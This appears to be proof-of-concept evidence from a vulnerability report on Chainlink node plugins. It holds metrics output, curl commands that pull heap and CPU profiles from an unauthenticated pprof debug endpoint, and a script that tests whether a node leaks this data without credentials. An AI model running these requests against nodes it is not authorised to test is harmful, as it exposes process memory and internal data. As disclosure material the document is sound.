# HELP mercury_wsrpc_request_latency Latency of requests made to the Mercury WSRPC server
# TYPE mercury_wsrpc_request_latency histogram
mercury_wsrpc_request_latency_bucket{le="10"} 0
mercury_wsrpc_request_latency_bucket{le="30"} 0
mercury_wsrpc_request_latency_bucket{le="100"} 0
mercury_wsrpc_request_latency_bucket{le="200"} 0
mercury_wsrpc_request_latency_bucket{le="250"} 0
mercury_wsrpc_request_latency_bucket{le="300"} 0
mercury_wsrpc_request_latency_bucket{le="350"} 0
mercury_wsrpc_request_latency_bucket{le="400"} 0
mercury_wsrpc_request_latency_bucket{le="500"} 0
mercury_wsrpc_request_latency_bucket{le="750"} 0
mercury_wsrpc_request_latency_bucket{le="1000"} 0
mercury_wsrpc_request_latency_bucket{le="3000"} 0
mercury_wsrpc_request_latency_bucket{le="10000"} 0
mercury_wsrpc_request_latency_bucket{le="+Inf"} 0
mercury_wsrpc_request_latency_sum 0
mercury_wsrpc_request_latency_count 0
# HELP multi_node_states The number of RPC nodes currently in the given state for the given chain
# TYPE multi_node_states gauge
multi_node_states{chainId="1337",network="EVM",state="Alive"} 1
multi_node_states{chainId="1337",network="EVM",state="Closed"} 0
multi_node_states{chainId="1337",network="EVM",state="Dialed"} 0
multi_node_states{chainId="1337",network="EVM",state="FinalizedBlockOutOfSync"} 0
multi_node_states{chainId="1337",network="EVM",state="FinalizedStateNotAvailable"} 0
multi_node_states{chainId="1337",network="EVM",state="InvalidChainID"} 0
multi_node_states{chainId="1337",network="EVM",state="OutOfSync"} 0
multi_node_states{chainId="1337",network="EVM",state="Syncing"} 0
multi_node_states{chainId="1337",network="EVM",state="Undialed"} 0
multi_node_states{chainId="1337",network="EVM",state="Unreachable"} 0
multi_node_states{chainId="1337",network="EVM",state="Unusable"} 0
# HELP pool_rpc_node_client_version Tracks node RPC client versions
# TYPE pool_rpc_node_client_version gauge
pool_rpc_node_client_version{chainID="1337",network="EVM",nodeName="anvil",rpcClientVersion="0x"} 1
# HELP pool_rpc_node_num_transitions_to_alive Total number of times node has transitioned to Alive
# TYPE pool_rpc_node_num_transitions_to_alive counter
pool_rpc_node_num_transitions_to_alive{chainID="1337",network="EVM",nodeName="anvil"} 1
# HELP pool_rpc_node_num_transitions_to_invalid_chain_id Total number of times node has transitioned to InvalidChainID
# TYPE pool_rpc_node_num_transitions_to_invalid_chain_id counter
pool_rpc_node_num_transitions_to_invalid_chain_id{chainID="1337",network="EVM",nodeName="anvil"} 1
# HELP pool_rpc_node_polls_success The total number of successful poll checks for the given RPC node
# TYPE pool_rpc_node_polls_success counter
pool_rpc_node_polls_success{chainID="1337",network="EVM",nodeName="anvil"} 3
# HELP pool_rpc_node_polls_total The total number of poll checks for the given RPC node
# TYPE pool_rpc_node_polls_total counter
pool_rpc_node_polls_total{chainID="1337",network="EVM",nodeName="anvil"} 3
# HELP pool_rpc_node_verifies The total number of chain ID verifications for the given RPC node
# TYPE pool_rpc_node_verifies counter
pool_rpc_node_verifies{chainID="1337",network="EVM",nodeName="anvil"} 11
# HELP pool_rpc_node_verifies_failed The total number of failed chain ID verifications for the given RPC node
# TYPE pool_rpc_node_verifies_failed counter
pool_rpc_node_verifies_failed{chainID="1337",network="EVM",nodeName="anvil"} 10
# HELP pool_rpc_node_verifies_success The total number of successful chain ID verifications for the given RPC node
# TYPE pool_rpc_node_verifies_success counter
pool_rpc_node_verifies_success{chainID="1337",network="EVM",nodeName="anvil"} 1
# HELP process_cpu_seconds_total Total user and system CPU time spent in seconds.
# TYPE process_cpu_seconds_total counter
process_cpu_seconds_total 0.61
# HELP process_max_fds Maximum number of open file descriptors.
# TYPE process_max_fds gauge
process_max_fds 524287
# HELP process_network_receive_bytes_total Number of bytes received by the process over the network.
# TYPE process_network_receive_bytes_total counter
process_network_receive_bytes_total 86491
# HELP process_network_transmit_bytes_total Number of bytes sent by the process over the network.
# TYPE process_network_transmit_bytes_total counter
process_network_transmit_bytes_total 104450
# HELP process_open_fds Number of open file descriptors.
# TYPE process_open_fds gauge
process_open_fds 21
# HELP process_resident_memory_bytes Resident memory size in bytes.
# TYPE process_resident_memory_bytes gauge
process_resident_memory_bytes 6.3655936e+07
# HELP process_start_time_seconds Start time of the process since unix epoch in seconds.
# TYPE process_start_time_seconds gauge
process_start_time_seconds 1.78660414377e+09
# HELP process_virtual_memory_bytes Virtual memory size in bytes.
# TYPE process_virtual_memory_bytes gauge
process_virtual_memory_bytes 2.265772032e+09
# HELP process_virtual_memory_max_bytes Maximum amount of virtual memory available in bytes.
# TYPE process_virtual_memory_max_bytes gauge
process_virtual_memory_max_bytes 1.8446744073709552e+19
# HELP rpc_call_latency The duration of an RPC call in nanoseconds
# TYPE rpc_call_latency histogram
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="5e+07"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="1e+08"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="2e+08"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="5e+08"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="1e+09"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="2e+09"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="4e+09"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="8e+09"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false",le="+Inf"} 3
rpc_call_latency_sum{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false"} 1.4527003e+07
rpc_call_latency_count{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="false"} 3
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="5e+07"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="1e+08"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="2e+08"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="5e+08"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="1e+09"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="2e+09"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="4e+09"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="8e+09"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true",le="+Inf"} 12
rpc_call_latency_sum{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true"} 7.914278e+07
rpc_call_latency_count{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="CallContext",rpcUrl="rpcshim:8545",success="true"} 12
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="5e+07"} 11
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="1e+08"} 11
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="2e+08"} 11
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="5e+08"} 11
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="1e+09"} 11
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="2e+09"} 11
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="4e+09"} 11
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="8e+09"} 11
rpc_call_latency_bucket{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true",le="+Inf"} 11
rpc_call_latency_sum{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true"} 7.5428044e+07
rpc_call_latency_count{chainFamily="EVM",chainID="1337",isSendOnly="false",rpcCallName="latest_block",rpcUrl="rpcshim:8545",success="true"} 11
# HELP sql_query_timeout_percent SQL query time as a percentage of timeout.
# TYPE sql_query_timeout_percent histogram
sql_query_timeout_percent_bucket{le="10"} 15
sql_query_timeout_percent_bucket{le="20"} 15
sql_query_timeout_percent_bucket{le="30"} 15
sql_query_timeout_percent_bucket{le="40"} 15
sql_query_timeout_percent_bucket{le="50"} 15
sql_query_timeout_percent_bucket{le="60"} 15
sql_query_timeout_percent_bucket{le="70"} 15
sql_query_timeout_percent_bucket{le="80"} 15
sql_query_timeout_percent_bucket{le="90"} 15
sql_query_timeout_percent_bucket{le="100"} 15
sql_query_timeout_percent_bucket{le="110"} 15
sql_query_timeout_percent_bucket{le="120"} 15
sql_query_timeout_percent_bucket{le="+Inf"} 15
sql_query_timeout_percent_sum 1.005051178462884
sql_query_timeout_percent_count 15
# HELP uptime_seconds Uptime of the application measured in seconds
# TYPE uptime_seconds counter
uptime_seconds 120
# HELP version Application version information
# TYPE version counter
version{commit="",version="(devel)"} 1
--- mutex:
cycles/second=1497635313
sampling period=0
==== REAL PLUGIN PROFILE ANALYSIS (unauthenticated, no credentials) ====
Target: http://localhost:6688/plugins/evm.1337/debug/pprof/{heap,profile?seconds=5}
Captured from the real chainlink-evm process on Chainlink v2.59.0.
### 1) GET /plugins/evm.1337/debug/pprof/heap (binary pprof) ###
$ curl -s http://localhost:6688/plugins/evm.1337/debug/pprof/heap -o heap.bin
$ go tool pprof -top heap.bin
File: chainlink-evm
Build ID: 1ac268f22455e60b1117d0ee8d996197fb863058
Type: inuse_space
Time: Aug 13, 2026 at 7:38am (GMT)
Showing nodes accounting for 12113.22kB, 100% of 12113.22kB total
flat flat% sum% cum cum%
2051.05kB 16.93% 16.93% 2051.05kB 16.93% runtime.mallocgc
1056.33kB 8.72% 25.65% 1056.33kB 8.72% regexp.(*bitState).reset
1042.10kB 8.60% 34.26% 1042.10kB 8.60% github.com/ethereum/go-ethereum/metrics.newExpDecaySampleHeap (inline)
1036.68kB 8.56% 42.81% 1036.68kB 8.56% google.golang.org/protobuf/internal/filedesc.(*File).initDecls (inline)
1033.03kB 8.53% 51.34% 1033.03kB 8.53% regexp/syntax.(*compiler).inst (inline)
768.26kB 6.34% 57.68% 768.26kB 6.34% go.uber.org/zap/zapcore.newCounters (inline)
516.01kB 4.26% 61.94% 516.01kB 4.26% io.init.func1
513.12kB 4.24% 66.18% 513.12kB 4.24% golang.org/x/net/http2/hpack.newInternalNode (inline)
512.34kB 4.23% 70.41% 512.34kB 4.23% github.com/smartcontractkit/chain-selectors.init.3
512.08kB 4.23% 74.64% 1545.11kB 12.76% regexp.compile
512.06kB 4.23% 78.86% 512.06kB 4.23% internal/abi.NewName
512.05kB 4.23% 83.09% 512.05kB 4.23% net/http.(*persistConn).writeLoop
512.05kB 4.23% 87.32% 512.05kB 4.23% github.com/prometheus/client_golang/prometheus.newHistogram
512.03kB 4.23% 91.55% 512.03kB 4.23% github.com/ethereum/go-ethereum/core/vm.newFrontierInstructionSet
### 2) GET /plugins/evm.1337/debug/pprof/profile?seconds=5 (binary CPU) ###
$ curl -s "http://localhost:6688/plugins/evm.1337/debug/pprof/profile?seconds=5" -o cpu.bin
$ go tool pprof -top cpu.bin
File: chainlink-evm
Build ID: 1ac268f22455e60b1117d0ee8d996197fb863058
Type: cpu Duration: 5s
Time: Aug 13, 2026 at 7:38am (GMT)
Duration: 5s, Total samples = 10ms ( 0.2%)
Showing nodes accounting for 10ms, 100% of 10ms total
flat flat% sum% cum cum%
10ms 100% 100% 10ms 100% internal/sync.(*Mutex).Unlock (inline)
0 0% 100% 10ms 100% net/http.(*Transport).dialConnFor
0 0% 100% 10ms 100% net/http.(*Transport).startDialConnForLocked.func1
0 0% 100% 10ms 100% net/http.(*wantConn).getCtxForDial
0 0% 100% 10ms 100% sync.(*Mutex).Unlock
#!/usr/bin/env bash
# Capture REAL-node PoC output and write it to REAL_NODE_OUTPUT.txt.
# The target node must have an OCR2/CCIP LOOP plugin loaded (so /discovery
# lists it and /plugins/<name>/debug/pprof/heap returns the plugin's memory).
#
# Usage:
# CHAINLINK_URL=http://localhost:6688 CHAINLINK_PLUGIN=ocr2 ./run_real.sh
#
# On a VULNERABLE node the run prints "EXFILTRATED sensitive data (unauthenticated): ..."
# and PASSES. On a PATCHED node it FAILS with a 401 / WWW-Authenticate challenge.
set -e
cd "$(dirname "$0")"
: "${CHAINLINK_URL:?Set CHAINLINK_URL to the target Chainlink node (e.g. http://localhost:6688)}"
go test -v -run TestLoopPluginPprofUnauthenticated ./... | tee REAL_NODE_OUTPUT.txt
echo
echo ">>> Output saved to REAL_NODE_OUTPUT.txt - paste it into the PoC evidence section."
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment